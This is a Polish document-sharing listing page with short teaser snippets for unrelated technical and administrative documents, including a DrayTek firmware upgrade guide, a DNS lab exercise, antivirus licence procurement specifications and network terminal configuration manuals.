Brinet sp. z o.o. wyłączny przedstawiciel DrayTek w Polsce www.brinet.pl www.draytek.pl 1. Firmware Upgrade Utility 1.1. Metoda 1 (standardowa) 1.2. Metoda 2 (niestandardowa) 2. Serwer FTP 2.1. Lokalny serwer FTP 2.2. Zdalny serwer FTP 3. Upgrade przez Web Procedury aktualizacji zostały oparte

Bardziej szczegółowo

Laboratorium - Obserwacja procesu tłumaczenia nazw DNS

Laboratorium - Obserwacja procesu tłumaczenia nazw DNS Laboratorium - Obserwacja procesu tłumaczenia nazw DNS Cele Część 1: Obserwacja konwersji DNS nazwy URL na adres IP. Część 2: Obserwacja procesu przeszukiwania nazw DNS, przy pomocy polecenia Nslookup

Bardziej szczegółowo

WZP/WO/D-332-65/15 SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA

WZP/WO/D-332-65/15 SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA Przedmiotem zamówienia jest dostawa licencji na oprogramowanie antywirusowe wraz z centralnym zarządzaniem: Licencje na 600 stanowisk (w tym 15 instalacji serwerowych),

Bardziej szczegółowo

Graficzny terminal sieciowy ABA-X3. część druga. Podstawowa konfiguracja terminala

Graficzny terminal sieciowy ABA-X3. część druga. Podstawowa konfiguracja terminala Graficzny terminal sieciowy ABA-X3 część druga Podstawowa konfiguracja terminala Opracował: Tomasz Barbaszewski Ustawianie interfejsu sieciowego: Podczas pierwszego uruchomienia terminala: Program do konfiguracji

Bardziej szczegółowo

SYSTEMY OPERACYJNE I SIECI KOMPUTEROWE. Tryb konsolowy ćwiczenie b

SYSTEMY OPERACYJNE I SIECI KOMPUTEROWE. Tryb konsolowy ćwiczenie b Systemy operacyjne i sieci komputerowe. Ćwiczenie 2. 1 SYSTEMY OPERACYJNE I SIECI KOMPUTEROWE Tryb konsolowy ćwiczenie 2 012b Źródło: http://www.microsoft.com/technet/prodtechnol/windowsserver2003/pl/library/serv

Bardziej szczegółowo

Sprawa numer: BAK.WZP Warszawa, dnia 16 sierpnia 2016 r.

Sprawa numer: BAK.WZP Warszawa, dnia 16 sierpnia 2016 r. Sprawa numer: BAK.WZP.26.18.2016.30 Warszawa, dnia 16 sierpnia 2016 r. Zaproszenie do udziału w ustaleniu wartości zamówienia publicznego 1. Zamawiający: Skarb Państwa - Urząd Komunikacji Elektronicznej

Bardziej szczegółowo

ABA-X3 PXES v. 1.5.0 Podręczna instrukcja administratora. FUNKCJE SIECIOWE Licencja FDL (bez prawa wprowadzania zmian)

ABA-X3 PXES v. 1.5.0 Podręczna instrukcja administratora. FUNKCJE SIECIOWE Licencja FDL (bez prawa wprowadzania zmian) Grupa Ustawienia Sieciowe umożliwia skonfigurowanie podstawowych parametrów terminala: Interfejs ETH0 Umożliwia wybór ustawień podstawowego interfejsu sieciowego. W przypadku wyboru DHCP adres oraz inne

Bardziej szczegółowo